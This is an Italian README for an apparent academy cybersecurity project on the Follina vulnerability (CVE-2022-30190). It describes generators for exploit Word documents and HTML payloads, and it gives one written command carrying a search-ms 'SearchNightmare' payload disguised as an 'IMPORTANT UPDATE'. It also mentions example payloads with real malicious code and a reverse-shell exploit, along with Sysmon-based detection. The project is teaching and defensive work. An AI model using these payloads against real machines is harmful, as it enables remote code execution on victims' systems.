
Un progetto di cybersecurity della Fullstack Academy che esamina l'intero ciclo della vulnerabilità Follina (CVE-2022-30190), dallo sfruttamento al rilevamento e alla difesa.
Un progetto di cybersecurity della Fullstack Academy che esamina l'intero ciclo della vulnerabilità Follina (CVE-2022-30190), dallo sfruttamento alla rilevazione e difesa.
Team:
Questo set di strumenti presuppone che tu abbia un host web o che tu possa avviare un semplice webserver usando Python per ospitare i file payload generati o di esempio.
I file nella cartella Example Payloads contengono codice dannoso reale. Sono stati utilizzati con VM su una rete locale e non dovrebbero causare problemi su una rete sicura dove ti fidi di tutte le macchine, ma fai attenzione quando usi o modifichi questi file. Inoltre, i generatori di documenti e payload creano ovviamente file dannosi propri. Utilizza questi strumenti solo su VM o altri ambienti usa e getta! Non usare nessuno strumento qui che non capisci.
Per creare il documento Microsoft Word con l'exploit Follina, esegui docgen_v3.py, utilizzando le seguenti opzioni
Per creare un file html payload, usa generate_payload.py con il sottocomando poc per generare un payload proof of concept che apre la Calcolatrice di Windows o il sottocomando custom per generare un payload con il tuo script.
Esempi:
python generate_payload.py poc -o test.html genererà il payload della calcolatrice in test.htmlpython generate_payload.py custom -o test.html -p "search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=IMPORTANT%20UPDATE" genererà test.html come payload personalizzato con l'exploit SearchNightmareI payload di esempio si trovano nella cartella "Example Payloads".
La rilevazione di Follina richiede che Sysmon sia installato per registrare gli eventi. I nostri metodi di rilevazione qui si basano sulla ricerca di istanze in cui Microsoft Word chiama MSDT.exe, ma gli script possono essere modificati per cercare altri artefatti come gli argomenti usati da Follina nel suo comando Powershell. I seguenti strumenti sono disponibili:
Tutti i file docx, rtf e html di esempio sono puntati a payload ospitati all'indirizzo IP 10.0.2.15. Inoltre, se vuoi usare l'exploit della reverse shell, imposta un listener sulla porta 9999.